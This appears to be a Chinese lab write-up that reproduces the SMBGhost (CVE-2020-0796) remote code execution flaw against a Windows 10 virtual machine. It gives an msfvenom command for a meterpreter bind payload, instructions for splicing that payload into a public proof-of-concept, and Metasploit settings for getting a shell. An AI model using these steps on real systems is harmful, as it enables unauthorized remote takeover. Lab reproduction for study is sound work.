- 漏洞简介:
- 本漏洞源于SMBv3没有正确处理压缩的数据包,在解压数据包的时候使用客户端传过来的长度进行解压时,并没有检查长度是否合法,最终导致整数溢出。利用该漏洞,攻击方可直接远程攻击SMB服务端远程执行任意恶意代码,亦可通过构建恶意SMB服务端诱导客户端连接从而大规模攻击客户端。永恒之黑一旦被成功利用,其危害不亚于永恒之蓝。
- 同时,CVE-2020-0796漏洞与“永恒之蓝”系列漏洞极为相似,都是利用Windows SMB漏洞远程攻击获取系统最高权限。
- 实验环境:
- 攻击机:虚拟机kali
- 受害机:虚拟机win10
- 复现前的准备:
- Win10关闭防火墙
- 开启SMB服务
- 信息收集:
- 使用nmap探测存活主机
- 使用nmap探测存活主机开放的端口及操作系统
- 使用SMBGhost检验win10靶机是否存在漏洞
- 检测工具下载链接https://github.com/ollypwn/SMBGhost
- 漏洞验证
- 使用msf生成木马,并查看是否生成功msfvenom -p windows/x64/meterpreter/bind_tcp LPORT=4444 -b '\x00' -i 1 -f python>exploit.py
- (生成的文件在执行生成命令下所在的路径,也可以通过查找文件来查看它在哪)
- 将生成的exploit.py中的内容替换掉下载的POC文件中的exploit.py中的相应内容(把2中的内容替换为1中的内容,把1中圈出来的内容改为2中圈出的内容)这是生成的exploit.py文件
- 这是下载的POC文件里的exploit.py文件
- 这是替换后的文件
- 运行exploit.py脚本,发起攻击反弹shell,如果报错,检查一下网络是否能ping通,SMB服务是否打开,在多尝试运行几次
- 开启msf,使用监听模块
- msfconsole
- 设置正向连接payload
- set payload windows/x64/meterpreter/bind_tcp
- 设置监听端口(与上面生成的木马所设置的端口尽量相同)
- 设置目标IP
- 查看是否设置成功
- 进入shell命令行查看当前权限
- chcp 65001解决乱码问题
(CVE-2020-0796),俗称“永恒之黑”
最新推荐文章于 2024-07-22 20:21:42 发布